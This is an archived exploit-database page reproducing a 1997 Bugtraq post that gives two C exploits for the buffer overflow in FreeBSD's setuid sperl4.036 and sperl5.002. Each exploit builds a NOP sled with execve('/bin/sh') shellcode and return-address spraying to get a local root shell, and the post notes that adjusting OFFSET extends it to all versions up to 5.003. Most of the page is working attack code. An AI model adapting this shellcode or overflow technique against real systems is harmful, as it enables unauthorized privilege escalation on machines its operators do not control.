FreeBSD exploits for the Perl 5.003 (and earlier) overflow bug.
| Description: | Buffer overflow in Perl, already discussed in another entry. These are FreeBSD exploits for perl4.036, and 5.00X |
| Author: | Deliver <deliver@FREE.POLBOX.PL> wrote the exploits |
| Compromise: | root (local) |
| Vulnerable Systems: | FreeBSD with vulnerable perl (Version <= 5.003) installed. |
| Date: | 21 April 1997 |
Date: Mon, 21 Apr 1997 16:34:41 PDT
From: Deliver <deliver@FREE.POLBOX.PL>
To: BUGTRAQ@NETSPACE.ORG
Subject: Exploits for FreeBSD sperl4.036 & sperl5.00x
If somebody want to test perl5.00X or perl4.036 buffer overflow exploits
there are two for FreeBSD...
First works on perl4.036 and the second on perl5.002 ...
With a little modyfication of OFFSET value you can overflow all versions up
to perl5.003
------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/* Exploit for FreeBSD sperl4.036 by OVX */
/************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFFER_SIZE 1400
#define OFFSET 600
char *get_esp(void) {
asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];
main(int argc, char *argv[])
{
int i;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
for(i=0+1;i<BUFFER_SIZE-4;i+=4)
*(char **)&buf[i] = get_esp() - OFFSET;
memset(buf,0x90,768+1);
memcpy(&buf[768+1],execshell,strlen(execshell));
buf[BUFFER_SIZE-1]=0;
execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
}
------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/* Exploit for FreeBSD sperl5.00X by OVX */
/************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFFER_SIZE 1400
#define OFFSET 1000
char *get_esp(void) {
asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];
main(int argc, char *argv[])
{
int i;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
for(i=0;i<BUFFER_SIZE-4;i+=4)
*(char **)&buf[i] = get_esp() - OFFSET;
memset(buf,0x90,768);
memcpy(&buf[768],execshell,strlen(execshell));
buf[BUFFER_SIZE-1]=0;
execl("/usr/bin/sperl5.002", "/usr/bin/sperl5.002", buf, NULL);
}
------------cut-------------cut-------------cut------------cut------------
PS: Pozdrowienia dla wszystkich polskich hackerow ...
//////////////////////////////////////////////////////////////////////////
// ANY QUESTIONS ? //
// OVX - deliver@free.polbox.pl //
//////////////////////////////////////////////////////////////////////////
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
